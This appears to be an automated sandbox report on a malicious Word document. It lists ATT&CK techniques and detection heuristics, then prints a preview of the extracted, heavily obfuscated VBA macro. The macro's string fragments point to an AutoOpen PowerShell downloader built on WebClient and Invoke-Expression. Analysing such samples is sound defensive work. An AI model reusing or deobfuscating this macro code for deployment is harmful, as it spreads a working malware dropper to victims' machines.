Verdict: MALICIOUS (Risk Score 242)

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment
A critical OLE_VBA_SHELL heuristic fires on the sample, indicating a Shell() call within its VBA macros. Combined with the AutoOpen macro marker and the ClamAV detection signature 'Img.Dropper.PhishingLure-6443153-0', this strongly suggests the document is designed to execute a malicious payload. The VBA script itself is heavily obfuscated, but the presence of Shell() and the overall heuristic profile point to downloader or dropper functionality.
Heuristics (7):

- ClamAV: Img.Dropper.PhishingLure-6443153-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 87635 bytes |

SHA-256 (macros.bas): c3651e49ea53d0a83b9ce2dfe9c5fcc63b427c79020f3554bb0c262f1a877b11

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "KknfzPAbZ"
Function rKvQSkUaumI()
On Error Resume Next
AnbvFwEwq = (JCzdYQi - Rnd(43 * Tan(aAAKPUEzqtK)) / jNCswXkiEz * Oct(hwRsLzLturZa) * RBtdaAftcvVvA / Oct(hBjzWbP - Chr(250) + 581 - ChrB(LzcswizPi)) - 389 + mNbudHHE)
aGOhRADV = (bFHhjUOLGzwZCK - Rnd(43 * Tan(WVdoLZJIbVKViw)) / nouUzvBwI * Oct(pXuJlDzviv) * VdlWSwjLVz / Oct(OsKHfiNDVXUT - Chr(250) + 581 - ChrB(BOwpSLZABp)) - 389 + LIziwVmmV)
XPUWRsVBMEQ = (GiSuwSz) + Mid("dmY0GnS07qM07q+07qui+MuiraMui+Mu'+'ibc.07q+07qTM'+'07q+07qui+MuioStr07q+07qing(), aMui+MuiNrhuMui+MuiaMui+Mu'+'isMui+Mui);IMui+MuinvoMui+Muike-IMui+McfppQs87HbB6prJB", 8, 142)
SJrDZY = (rFCwwLtisN - Rnd(43 * Tan(CzYwpvBiCBtMN)) / IminXZsS * Oct(XOJBfjEz) * BqHnpdFi / Oct(ZBSwspl - Chr(250) + 581 - ChrB(ZOrVozkrAjjtV)) - 389 + wBmKWCV)
DndsajzjB = (Vcfvdzo - Rnd(43 * Tan(TUAEENcjLYA)) / GZzPAFzNDM * Oct(fMfRcNYbC) * KRldIVwVXEHsa / Oct(wiQvXzbZGGVsYw - Chr(250) + 581 - ChrB(TmwziwH)) - 389 + lsjBrfIG)
pLizzwUO = (lNqXwotY - Rnd(43 * Tan(kXCQLhTjScNIh)) / jTCbOMdduI * Oct(BzffZIIJzivOY) * oAjZiczEs / Oct(DtNfMKGc - Chr(250) + 581 - ChrB(YJknEtTEzhmkFi)) - 389 + ZMzDPfsz)
oIoBL = (BioTTQpZVTPsHp) + Mid("DT5GbPni+Muinc = Mui'+'+MuinMu07q+07qi+Muiew-Mui+MuiobMui+MuijMui+MuieMui+Muict System.Net.Mui+MuiWeMui+MuibClMui+Muiient;aNMui+MuirnMui+Muis07q+07qadaMui+MuisMuWmnCjd9", 8, 154)
vfnSOjiZZC = (mhUzwdDFQkLi - Rnd(43 * Tan(PzCVERLu)) / CpSiCowjtwziGr * Oct(CWJssNLwhdc) * wWbqvrpiffRa / Oct(IhrMiZJFa - Chr(250) + 581 - ChrB(hISCiqtkB)) - 389 + BzNRIErQMwX)
ELcLJNz = (iPXpWkDr - Rnd(43 * Tan(fpoSbodSMcPowI)) / KKIGwMIAhNkEQ * Oct(EJllfZn) * PDOczcCnSmGiiL / Oct(zvnWoHErjMR - Chr(250) + 581 - ChrB(SdCQjARv)) - 389 + rTNfwtv)
TcSzLLG = (SjYDuhc - Rnd(43 * Tan(HoluPANLTZEZi)) / tdvcZpSCWKhwHV * Oct(KXacCIYKco) * OXMticVZnuHR / Oct(mWFRbNRt - Chr(250) + 581 - ChrB(nJCizjkUTTnqa)) - 389 + pdfEdiiiCGRpfD)
MfFOzBAWEla = (jcjjTjC) + Mid("Lj7OuAmwPW6Yf109+[07q+07qcHAR'+']'+'68),[cHA'+'R]39 -ReplAce ([cHAR]57+[cHAR]72+[cHAR]111),[c07q+07qHAR]92) amU&( WxQVERBOSe'+'pR'+'eferenCe.ToS07q+07qt07q+07q'+'Ring()'+'[1,3]+MuiXMui-JoinM07q7ZB", 14, 180)
RZdHsiqp = (zhWthoqsDzmLMf - Rnd(43 * Tan(iVjKPWXiN)) / WGcZqpOJt * Oct(iuOlpMXjBfjt) * DiKOjfaa / Oct(JcLhNSMJYCStln - Chr(250) + 581 - ChrB(wUDzqjij)) - 389 + uYvjbfiTLfl)
lcQvoUZnhOi = (MpZqvPuTNdL - Rnd(43 * Tan(iKsLIbNjm)) / nVdSwCKKdScz * Oct(HGVmDJDPsvsLh) * VjSAArbCEMdSs / Oct(CAtliXkF - Chr(250) + 581 - ChrB(oJajVuZlGPOp)) - 389 + LRcHLFBJJlR)
tQLjGIkOd = (QOcbjSb - Rnd(43 * Tan(inpXjitYziGCVY)) / EuXobzBb * Oct(EcLQBsbM) * prUJjnJO / Oct(ckLoirCX - Chr(250) + 581 - ChrB(MiAzjMiTDWc)) - 389 + HHtrjjruNj)
rpnTjjSjuH = (ZHwETrHhbSRq) + Mid("LwNA3RKzME[3,11'+',2]-JOiN07q07q) ((07q ((07q+07qMuiaNr07q+07qfMui+MuiraMuTKcDhTuXuGYkEZGA6b2rSRhtz9", 9, 66)
rtwpSoGR = (NsCGdKCQzdrZIG - Rnd(43 * Tan(fbWDdSbp)) / JbMfDdfYJoI * Oct(XidFLZd) * aDzEzWhmhnbl / Oct(bzBzXMU - Chr(250) + 581 - ChrB(TQTwEIwtwStzHA)) - 389 + cHhhvsq)
hwXCkbmP = (RnYOJbihnSXbzV - Rnd(43 * Tan(WJzvlpKzJS)) / EwcTzFTB * Oct(biGjBKRDGswidh) * DbckKGpOww / Oct(lFTVSIvZun - Chr(250) + 581 - ChrB(PtaXHrQ)) - 389 + caPDPVdir)
ZKEmjTutr = (HmfGtOltjVio - Rnd(43 * Tan(arZqpfYFcuGbEM)) / SrijoYtTw * Oct(oSKzHAd) * EVqBQwhkdfsY / Oct(oBWasrCAXhX - Chr(250) + 581 - ChrB(pBMOGVtctzr)) - 389 + QafwDuNaXW)
rnPZFS = (MWAvhbHoNJ) + Mid("KzjoB5JBUO(4mD,4mMui+MuiDMui+Mui);Mui+07q+07qMuiaNrkMui+M'+'u'+'iarapMui+M07q+07quiaMu'+'i+Muis = Mui+MuiaNM07q+07qui+MuirMui+Muinsadasd.nMui+Muiext(1Mui+Mui,Mui+Mu07qjvNbCBsi", 11, 157)
YjBCNiA = (lUJliZMjkaqnD - Rnd(43 * Tan(kAMiJmwwzdWw)) / BDzoZDkJTt * Oct(PBKXGqcoXcS) * JvYFqnXjP / Oct(DKfllQkTdRGi - Chr(250) + 581 - ChrB(IbbrGAhZt)) - 389 + oqtAztWwNOhz)
zMwavXIA = (ZiSwASoc - Rnd(43 * Tan(ajpujQziJqBV)) / jAziWAsvKqt * Oct(BAzzhXYIcw) * tBGbMJuMQl / Oct(vSAVvnkp
... (truncated)